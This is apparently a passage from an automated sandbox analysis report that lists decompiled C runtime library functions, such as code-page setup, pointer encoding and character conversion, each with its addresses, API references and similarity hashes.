									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x38 + 0x415ae0[ *(_t119 - 0x20) >> 5];
									 *_t118 =  *( *(_t119 - 0x1c));
									_t118[1] =  *_t89;
									_push(0xfa0);
									_t39 =  &(_t118[3]); // 0xc
									_t61 = E00407B82(_t89, _t102, _t107, _t118, _t132, _t140);
									if(_t61 == 0) {
										goto L45;
									}
									_t118[2] = _t118[2] + 1;
									goto L25;
								}
								_t86 = GetFileType(_t98);
								_t132 = _t86;
								if(_t86 == 0) {
									goto L25;
								}
								goto L23;
							}
							L25:
							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
							_t89 =  &(_t89[0]);
							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
						} while ( *(_t119 - 0x20) < _t107);
						goto L26;
					}
					_t101 =  &(0x415ae0[_t114]);
					 *_t101 = _t77;
					 *0x415ac8 =  *0x415ac8 + 0x20;
					_t18 =  &(_t77[0x1c0]); // 0x700
					_t102 = _t18;
					while(1) {
						__eflags = _t77 - _t102;
						if(_t77 >= _t102) {
							break;
						}
						_t77[1] = 0;
						 *_t77 =  *_t77 | 0xffffffff;
						_t77[1] = 0xa;
						_t77[2] = _t77[2] & 0x00000000;
						_t77[9] = _t77[9] & 0x00000080;
						_t77[9] = 0xa;
						_t77[9] = 0xa;
						_t77 =  &(_t77[0xe]);
						_t102 =  &(( *_t101)[0x1c0]);
						__eflags = _t102;
					}
					_t114 = _t114 + 1;
					__eflags = _t114;
				}
				goto L17;
			}

0x00407844
0x00407844
0x00407844
0x00407846
0x0040784b
0x00407852
0x00407859
0x0040785f
0x00407866
0x0040786a
0x0040786b
0x0040786c
0x00407875
0x00407a7b
0x00407a7b
0x00407a7b
0x00407a7e
0x00407a83
0x00407a83
0x0040787b
0x00407880
0x00407886
0x00407886
0x004078b7
0x0040788e
0x00407892
0x00407895
0x00407899
0x0040789c
0x004078a0
0x004078a4
0x004078a8
0x004078b1
0x004078b1
0x004078b1
0x004078bf
0x004079c2
0x004079c2
0x004079c4
0x004079c9
0x004079cf
0x004079d4
0x004079e1
0x004079e5
0x004079e7
0x004079f3
0x004079f5
0x004079f5
0x004079e9
0x004079eb
0x004079eb
0x004079ff
0x00407a01
0x00407a04
0x00407a49
0x00407a49
0x00407a49
0x00407a49
0x00407a4d
0x00000000
0x00407a06
0x00407a06
0x00407a08
0x00000000
0x00000000
0x00407a0b
0x00407a11
0x00407a13
0x00000000
0x00000000
0x00407a15
0x00407a17
0x00407a1c
0x00407a1f
0x00407a27
0x00407a2a
0x00407a2c
0x00407a2c
0x00407a2c
0x00407a2c
0x00407a21
0x00407a21
0x00407a21
0x00407a30
0x00407a35
0x00407a39
0x00407a40
0x00407a42
0x00000000
0x00407a44
0x00407a44
0x00000000
0x00407a44
0x00407a42
0x004079db
0x004079db
0x004079db
0x00407a53
0x00407a53
0x00407a54
0x00407a63
0x00407a69
0x00000000
0x00407a69
0x004078c5
0x004078ca
0x00000000
0x00000000
0x004078d0
0x004078d2
0x004078d8
0x004078e2
0x004078e4
0x004078e4
0x004078e8
0x0040793d
0x004078ef
0x004078f6
0x004078f8
0x00407947
0x0040794d
0x0040794d
0x00407953
0x00000000
0x00000000
0x00000000
0x00000000
0x00407955
0x00407955
0x00407958
0x0040795d
0x00407964
0x00407968
0x00000000
0x00000000
0x0040796c
0x00407979
0x00407987
0x00407993
0x00407997
0x0040799a
0x0040799f
0x004079a3
0x004079ac
0x00000000
0x00000000
0x004079b2
0x00000000
0x004079b2
0x0040796f
0x00407975
0x00407977
0x00000000
0x00000000
0x00000000
0x00407977
0x004079b5
0x004079b5
0x004079b8
0x004079b9
0x004079bd
0x00000000
0x00407955
0x004078fa
0x00407901
0x00407903
0x0040790a
0x0040790a
0x00407938
0x00407938
0x0040793a
0x00000000
0x00000000
0x00407912
0x00407916
0x00407919
0x0040791d
0x00407921
0x00407925
0x00407929
0x0040792d
0x00407932
0x00407932
0x00407932
0x0040793c
0x0040793c
0x0040793c
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 00407859
__calloc_crt.LIBCMT ref: 0040786C

Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC

__calloc_crt.LIBCMT ref: 004078EF
GetFileType.KERNEL32(00000038), ref: 0040796F
___crtInitCritSecAndSpinCount.LIBCMT ref: 004079A3
GetStdHandle.KERNEL32(-000000F6), ref: 004079F9
GetFileType.KERNEL32(00000000), ref: 00407A0B
___crtInitCritSecAndSpinCount.LIBCMT ref: 00407A39
SetHandleCount.KERNEL32 ref: 00407A63

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
String ID:
API String ID: 1318386821-0
Opcode ID: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
Instruction ID: 69dbfb245cb0b330f8ea7ce656b2dbe2117018d0c8ec9728b90aae803ce677d5
Opcode Fuzzy Hash: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
Instruction Fuzzy Hash: 24610AB1E4C7418ED7108B78C844B567BA0AF52334F29837AD4A5BB2E1D73CB845CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC9 Relevance: 10.7, APIs: 7, Instructions: 158
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E00405CC9(void* __ecx, void* __edx, void* __eflags, void* __fp0, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t67;
				signed char* _t77;
				signed int _t80;
				int _t81;
				signed int _t84;
				intOrPtr* _t85;
				int _t89;
				signed char _t90;
				signed int _t91;
				int _t93;
				int _t95;
				signed int _t96;
				signed int _t99;
				intOrPtr* _t103;
				signed int _t105;
				void* _t112;

				_t112 = __fp0;
				_t53 =  *0x413004; // 0xf284055d
				_v8 = _t53 ^ _t105;
				_t81 = _a8;
				_t95 = E00405C4F(_a4);
				_t98 = 0;
				_t110 = _t95;
				_a4 = _t95;
				if(_t95 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x4136d8)) - _t95;
						if( *((intOrPtr*)(_t56 + 0x4136d8)) == _t95) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t95 - 0xfde8;
							if(_t95 == 0xfde8) {
								L35:
								_t65 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t95 - 0xfde9;
								if(_t95 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t95 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t95,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x4144b0 - _t98;
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E00409280(_t95, _t81 + 0x1c, _t98, 0x101);
											_t93 = 1;
											__eflags = _v28 - 1;
											 *(_t81 + 4) = _t95;
											 *(_t81 + 0xc) = _t98;
											if(_v28 <= 1) {
												 *(_t81 + 8) = _t98;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t103 =  &_v21;
													while(1) {
														_t90 =  *_t103;
														__eflags = _t90;
														if(_t90 == 0) {
															goto L29;
														}
														_t80 =  *(_t103 - 1) & 0x000000ff;
														_t91 = _t90 & 0x000000ff;
														while(1) {
															__eflags = _t80 - _t91;
															if(_t80 > _t91) {
																break;
															}
															 *(_t81 + _t80 + 0x1d) =  *(_t81 + _t80 + 0x1d) | 0x00000004;
															_t80 = _t80 + 1;
															__eflags = _t80;
														}
														_t103 = _t103 + 2;
														__eflags =  *(_t103 - 1);
														if( *(_t103 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t77 = _t81 + 0x1e;
												_t89 = 0xfe;
												do {
													 *_t77 =  *_t77 | 0x00000008;
													_t77 =  &(_t77[1]);
													_t89 = _t89 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t81 + 0xc) = E0040599D( *(_t81 + 4));
												 *(_t81 + 8) = _t93;
											}
											_t95 = _t81 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t98 = _t81;
											E00405A21(_t81, _t112);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E00409280(_t95, _t81 + 0x1c, _t98, 0x101);
					_t84 = _v32 * 0x30;
					_v36 = _t98;
					_t99 = _t84 + 0x4136e8;
					_v32 = _t99;
					while(1) {
						L21:
						__eflags =  *_t99;
						if( *_t99 == 0) {
							break;
						}
						_t59 =  *(_t99 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t96 =  *_t99 & 0x000000ff;
							_t67 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t96 - _t67;
								if(_t96 > _t67) {
									break;
								}
								 *(_t81 + _t96 + 0x1d) =  *(_t81 + _t96 + 0x1d) |  *(_v36 + 0x4136d4);
								_t67 =  *(_t99 + 1) & 0x000000ff;
								_t96 = _t96 + 1;
								__eflags = _t96;
							}
							_t95 = _a4;
							_t99 = _t99 + 2;
							__eflags = _t99;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t99 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t99;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t81 + 4) = _t95;
					 *(_t81 + 8) = 1;
					_t61 = E0040599D(_t95);
					 *(_t81 + 0xc) = _t61;
					_t62 = _t81 + 0x10;
					_t85 = _t84 + 0x4136dc;
					_t93 = 6;
					do {
						 *_t62 =  *_t85;
						_t85 = _t85 + 2;
						_t62 = _t62 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L25;
				} else {
					L1:
					E004059CC(_t81, _t110);
					L2:
					_t65 = 0;
				}
				L36:
				return E0040318A(_t65, _t81, _v8 ^ _t105, _t93, _t95, _t98);
			}

0x00405cc9
0x00405ccf
0x00405cd6
0x00405cda
0x00405ce7
0x00405ce9
0x00405ceb
0x00405ced
0x00405cf0
0x00405d00
0x00405d03
0x00405d03
0x00405d05
0x00405d05
0x00405d0b
0x00000000
0x00000000
0x00405d11
0x00405d14
0x00405d17
0x00405d1c
0x00000000
0x00405d1e
0x00405d1e
0x00405d24
0x00405e90
0x00405e90
0x00405e90
0x00405d2a
0x00405d2a
0x00405d30
0x00000000
0x00405d36
0x00405d3a
0x00405d40
0x00405d42
0x00000000
0x00405d48
0x00405d4d
0x00405d53
0x00405d55
0x00405e84
0x00405e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d5b
0x00405d65
0x00405d6c
0x00405d70
0x00405d73
0x00405d76
0x00405d79
0x00405e77
0x00405d7f
0x00405d7f
0x00405d83
0x00405d89
0x00405d8c
0x00405d8c
0x00405d8e
0x00405d90
0x00000000
0x00000000
0x00405d96
0x00405d9a
0x00405e48
0x00405e48
0x00405e4a
0x00000000
0x00000000
0x00405e42
0x00405e47
0x00405e47
0x00405e47
0x00405e4d
0x00405e4e
0x00405e52
0x00000000
0x00000000
0x00000000
0x00405e52
0x00405d8c
0x00405e58
0x00405e58
0x00405e5b
0x00405e60
0x00405e60
0x00405e63
0x00405e64
0x00405e64
0x00405e64
0x00405e6f
0x00405e72
0x00405e72
0x00405e7c
0x00405e7f
0x00405e80
0x00405e81
0x00405e36
0x00405e36
0x00405e38
0x00000000
0x00405e38
0x00405d55
0x00405d42
0x00405d30
0x00405d24
0x00000000
0x00405d1c
0x00405dac
0x00405db7
0x00405dba
0x00405dbd
0x00405dc3
0x00405df2
0x00405df2
0x00405df2
0x00405df5
0x00000000
0x00000000
0x00405dc8
0x00405dcb
0x00405dcd
0x00405dcf
0x00405dd2
0x00405de9
0x00405de9
0x00405deb
0x00000000
0x00000000
0x00405de0
0x00405de4
0x00405de8
0x00405de8
0x00405de8
0x00405ded
0x00405df1
0x00405df1
0x00000000
0x00405df1
0x00000000
0x00405dcd
0x00405dfa
0x00405dfd
0x00405e00
0x00405e04
0x00405e07
0x00000000
0x00000000
0x00405e0b
0x00405e0e
0x00405e15
0x00405e1c
0x00405e1f
0x00405e22
0x00405e28
0x00405e29
0x00405e2d
0x00405e30
0x00405e32
0x00405e33
0x00405e33
0x00405e33
0x00000000
0x00405cf2
0x00405cf2
0x00405cf4
0x00405cf9
0x00405cf9
0x00405cf9
0x00405e93
0x00405ea1

APIs

getSystemCP.LIBCMT ref: 00405CE2

Part of subcall function 00405C4F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405C5C
Part of subcall function 00405C4F: GetOEMCP.KERNEL32(00000000), ref: 00405C76

setSBCS.LIBCMT ref: 00405CF4

Part of subcall function 004059CC: _memset.LIBCMT ref: 004059DF

IsValidCodePage.KERNEL32(-00000030), ref: 00405D3A
GetCPInfo.KERNEL32(00000000,?), ref: 00405D4D
_memset.LIBCMT ref: 00405D65
setSBUpLow.LIBCMT ref: 00405E38

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
String ID:
API String ID: 2658552758-0
Opcode ID: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
Instruction ID: d2136bea0d1a2f065ec75707fb5b56249d955542dcdf0261cb1fe3d024273208
Opcode Fuzzy Hash: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
Instruction Fuzzy Hash: BC5100719046549BDB258F65C8846BFBBB5EF04304F14847BD886BF282C63C8A42CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00406443 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00406443(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t11;
				void* _t13;
				struct HINSTANCE__* _t15;
				void* _t20;

				if(TlsGetValue( *0x4138c4) == 0) {
					L4:
					_t15 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t15;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E00406360(__eflags, _t20);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t15, "DecodePointer");
					L7:
					if(_t9 != 0) {
						_v0 =  *_t9(_a4);
					}
					goto L9;
				}
				_t11 =  *0x4138c0; // 0xffffffff
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x4138c4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1fc);
				goto L7;
			}

0x00406454
0x00406477
0x00406482
0x00406484
0x00406486
0x004064ab
0x004064b0
0x004064b0
0x00406488
0x0040648d
0x0040648f
0x00000000
0x00000000
0x00406497
0x0040649d
0x0040649f
0x004064a7
0x004064a7
0x00000000
0x0040649f
0x00406456
0x0040645e
0x00000000
0x00000000
0x00406460
0x00406469
0x0040646d
0x00000000
0x00000000
0x0040646f
0x00000000

APIs

TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497

Strings

DecodePointer, xrefs: 00406491
KERNEL32.DLL, xrefs: 00406477

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Value$AddressHandleModuleProc
String ID: DecodePointer$KERNEL32.DLL
API String ID: 1929421221-629428536
Opcode ID: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
Instruction ID: c5ae10eeeadb9dadabf971efa998db1139b8a5cf31b1e54eaa7b2be9f0bd982d
Opcode Fuzzy Hash: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
Instruction Fuzzy Hash: 25F03670900612ABC611EB78ED04DAB3BE4AF017A07168572FC45F72F0DB38DD658AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004063CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004063CC(intOrPtr _a4) {
				intOrPtr _v0;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				intOrPtr _t11;
				void* _t13;
				struct HINSTANCE__* _t15;
				void* _t20;

				if(TlsGetValue( *0x4138c4) == 0) {
					L4:
					_t15 = GetModuleHandleA("KERNEL32.DLL");
					__eflags = _t15;
					if(__eflags == 0) {
						L9:
						return _a4;
					}
					_t8 = E00406360(__eflags, _t20);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L9;
					}
					_t9 = GetProcAddress(_t15, "EncodePointer");
					L7:
					if(_t9 != 0) {
						_v0 =  *_t9(_a4);
					}
					goto L9;
				}
				_t11 =  *0x4138c0; // 0xffffffff
				if(_t11 == 0xffffffff) {
					goto L4;
				}
				_push(_t11);
				_t13 =  *(TlsGetValue( *0x4138c4))();
				if(_t13 == 0) {
					goto L4;
				}
				_t9 =  *(_t13 + 0x1f8);
				goto L7;
			}

0x004063dd
0x00406400
0x0040640b
0x0040640d
0x0040640f
0x00406434
0x00406439
0x00406439
0x00406411
0x00406416
0x00406418
0x00000000
0x00000000
0x00406420
0x00406426
0x00406428
0x00406430
0x00406430
0x00000000
0x00406428
0x004063df
0x004063e7
0x00000000
0x00000000
0x004063e9
0x004063f2
0x004063f6
0x00000000
0x00000000
0x004063f8
0x00000000

APIs

TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420

Strings

KERNEL32.DLL, xrefs: 00406400
EncodePointer, xrefs: 0040641A

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Value$AddressHandleModuleProc
String ID: EncodePointer$KERNEL32.DLL
API String ID: 1929421221-3682587211
Opcode ID: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
Instruction ID: cf491b8ffedcf847512659abc69032a8f38a6fac2648f49244538ea113319bae
Opcode Fuzzy Hash: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
Instruction Fuzzy Hash: D9F0BB30901122ABD7116B6CDD00ADB3BD49F007547168072FC05F32F1DB38CC568AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040906B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040906B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				signed short* _t58;
				short* _t59;
				int _t64;
				void* _t70;
				char* _t71;

				_t70 = __edi;
				_t71 = _a8;
				if(_t71 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t71 != 0) {
						E004032D9( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E00409195( *_t71 & 0x000000ff,  &_v20) == 0) {
								_t40 = _v20 + 4; // 0x840ffff8
								if(MultiByteToWideChar( *_t40, 9, _t71, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = L00403CE9(_t50, 0, _t70, _t71);
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t50 = _v20;
							_t15 = _t50 + 0xac; // 0xa045ff98
							_t64 =  *_t15;
							if(_t64 <= 1 || _a12 < _t64) {
								L17:
								_t24 = _t50 + 0xac; // 0xa045ff98
								if(_a12 <  *_t24 || _t71[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t21 = _t50 + 4; // 0x840ffff8
								_t57 = MultiByteToWideChar( *_t21, 9, _t71, _t64, _a4, 0 | _a4 != 0x00000000);
								_t50 = _v20;
								if(_t57 != 0) {
									L19:
									_t27 = _t50 + 0xac; // 0xa045ff98
									_t56 =  *_t27;
									if(_v8 == 0) {
										return _t56;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t56;
								}
								goto L17;
							}
						}
						_t58 = _a4;
						if(_t58 != 0) {
							 *_t58 =  *_t71 & 0x000000ff;
						}
						goto L10;
					} else {
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 = 0;
						}
						goto L5;
					}
				}
			}

0x0040906b
0x00409073
0x0040907a
0x0040908f
0x00000000
0x00409081
0x00409083
0x0040909b
0x004090a6
0x004090d8
0x0040916b
0x00409176
0x004090b6
0x004090b9
0x004090be
0x004090be
0x00000000
0x004090c4
0x00409138
0x00409138
0x0040913d
0x00409146
0x00409148
0x0040914b
0x0040914b
0x00000000
0x0040914f
0x004090da
0x004090dd
0x004090dd
0x004090e6
0x0040910d
0x00409110
0x00409116
0x00000000
0x00000000
0x00000000
0x00000000
0x004090ed
0x004090fd
0x00409100
0x00409108
0x0040910b
0x0040911d
0x00409120
0x00409120
0x00409126
0x00409094
0x00409094
0x0040912f
0x00000000
0x0040912f
0x00000000
0x0040910b
0x004090e6
0x004090a8
0x004090ad
0x004090b3
0x004090b3
0x00000000
0x00409085
0x00409085
0x0040908a
0x0040908c
0x0040908c
0x00000000
0x0040908a
0x00409083

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040909B
__isleadbyte_l.LIBCMT ref: 004090CF
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00408678,?,?,00000002), ref: 00409100
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00408678,?,?,00000002), ref: 0040916E

Strings

pYet, xrefs: 00409100, 0040916E

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: pYet
API String ID: 3058430110-1727283320
Opcode ID: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
Instruction ID: 60a8676b7946a16de792e5a19dc617b5d93a58ec6caea168880f03a11062425c
Opcode Fuzzy Hash: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
Instruction Fuzzy Hash: F231C031B00246EFEB20DFA4C8849AA7BA5AF00311F1485BAE5A4AF2D2D7359D40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC9 Relevance: 7.7, APIs: 5, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00408DC9(void* __edx, void* __fp0, signed int _a4, signed char** _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				void* _t49;
				void* _t53;
				signed short _t56;
				signed int _t61;
				signed int _t71;
				signed int _t77;
				signed char* _t93;
				signed char* _t102;
				signed char* _t104;
				void* _t112;
				signed char** _t114;
				signed int _t115;

				_t128 = __fp0;
				_t112 = __edx;
				_t39 =  *0x413004; // 0xf284055d
				_v8 = _t39 ^ _t115;
				_t114 = _a8;
				if((_t114[3] & 0x00000040) != 0) {
					L34:
					_t34 =  &(_t114[1]);
					 *_t34 =  &(_t114[1][0xfffffffffffffffe]);
					if( *_t34 < 0) {
						_t42 = E0040BE3B(_t81, _t112, 0x413a18, _t128, _a4 & 0x0000ffff, _t114);
					} else {
						_t42 = _a4;
						 *( *_t114) = _a4;
						 *_t114 =  &(( *_t114)[2]);
					}
					L37:
					return E0040318A(_t42, _t81, _v8 ^ _t115, _t112, 0x413a18, _t114);
				}
				if(E00408D9C(_t115, __fp0, _t114) == 0xffffffff || E00408D9C(_t115, __fp0, _t114) == 0xfffffffe) {
					_t45 = 0x413a18;
				} else {
					_t77 = E00408D9C(_t115, __fp0, _t114) >> 5;
					_t81 = 0x415ae0 + _t77 * 4;
					_t45 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t77 * 4);
				}
				_t8 = _t45 + 0x24; // 0x0
				if(( *_t8 & 0x0000007f) == 2) {
					goto L34;
				} else {
					if(E00408D9C(_t115, _t128, _t114) == 0xffffffff || E00408D9C(_t115, _t128, _t114) == 0xfffffffe) {
						_t49 = 0x413a18;
					} else {
						_t71 = E00408D9C(_t115, _t128, _t114) >> 5;
						_t81 = 0x415ae0 + _t71 * 4;
						_t49 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t71 * 4);
					}
					_t11 = _t49 + 0x24; // 0x0
					if(( *_t11 & 0x0000007f) != 1) {
						if(E00408D9C(_t115, _t128, _t114) == 0xffffffff || E00408D9C(_t115, _t128, _t114) == 0xfffffffe) {
							_t53 = 0x413a18;
						} else {
							_t61 = E00408D9C(_t115, _t128, _t114) >> 5;
							_t81 = 0x415ae0 + _t61 * 4;
							_t53 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t61 * 4);
						}
						if(( *(_t53 + 4) & 0x00000080) == 0) {
							goto L34;
						} else {
							_t56 = E0040C10A( &_v20,  &_v16, 5, _a4);
							if(_t56 != 0) {
								goto L15;
							}
							_t81 = 0;
							if(_v20 <= 0) {
								L33:
								_t42 = _a4;
								goto L37;
							} else {
								goto L28;
							}
							while(1) {
								L28:
								_t26 =  &(_t114[1]);
								 *_t26 = _t114[1] - 1;
								if( *_t26 < 0) {
									_t56 = E00404C86(_t81, 0x413a18,  *((char*)(_t115 + _t81 - 0xc)), _t114);
								} else {
									 *( *_t114) =  *((intOrPtr*)(_t115 + _t81 - 0xc));
									_t93 =  *_t114;
									_t56 =  *_t93 & 0x000000ff;
									 *_t114 =  &(_t93[1]);
								}
								if(_t56 == 0xffffffff) {
									goto L15;
								}
								_t81 = _t81 + 1;
								if(_t81 < _v20) {
									continue;
								}
								goto L33;
							}
							goto L15;
						}
					} else {
						_t12 =  &(_t114[1]);
						 *_t12 = _t114[1] - 1;
						_t81 = _a4;
						if( *_t12 < 0) {
							_t56 = E00404C86(_t81, 0x413a18, _t81, _t114);
						} else {
							 *( *_t114) = _t81;
							_t104 =  *_t114;
							_t56 =  *_t104 & 0x000000ff;
							 *_t114 =  &(_t104[1]);
						}
						if(_t56 != 0xffffffff) {
							_t15 =  &(_t114[1]);
							 *_t15 = _t114[1] - 1;
							if( *_t15 < 0) {
								_t56 = E00404C86(_t81, 0x413a18, _t81, _t114);
							} else {
								 *( *_t114) = _t81;
								_t102 =  *_t114;
								_t56 =  *_t102 & 0x000000ff;
								 *_t114 =  &(_t102[1]);
							}
							if(_t56 == 0xffffffff) {
								goto L15;
							} else {
								_t42 = _t81;
								goto L37;
							}
						} else {
							L15:
							_t42 = _t56 | 0x0000ffff;
							goto L37;
						}
					}
				}
			}

0x00408dc9
0x00408dc9
0x00408dcf
0x00408dd6
0x00408ddb
0x00408de3
0x00408f78
0x00408f78
0x00408f78
0x00408f7c
0x00408f91
0x00408f7e
0x00408f80
0x00408f83
0x00408f86
0x00408f86
0x00408f98
0x00408fa6
0x00408fa6
0x00408df8
0x00408e28
0x00408e06
0x00408e0c
0x00408e10
0x00408e22
0x00408e25
0x00408e2a
0x00408e31
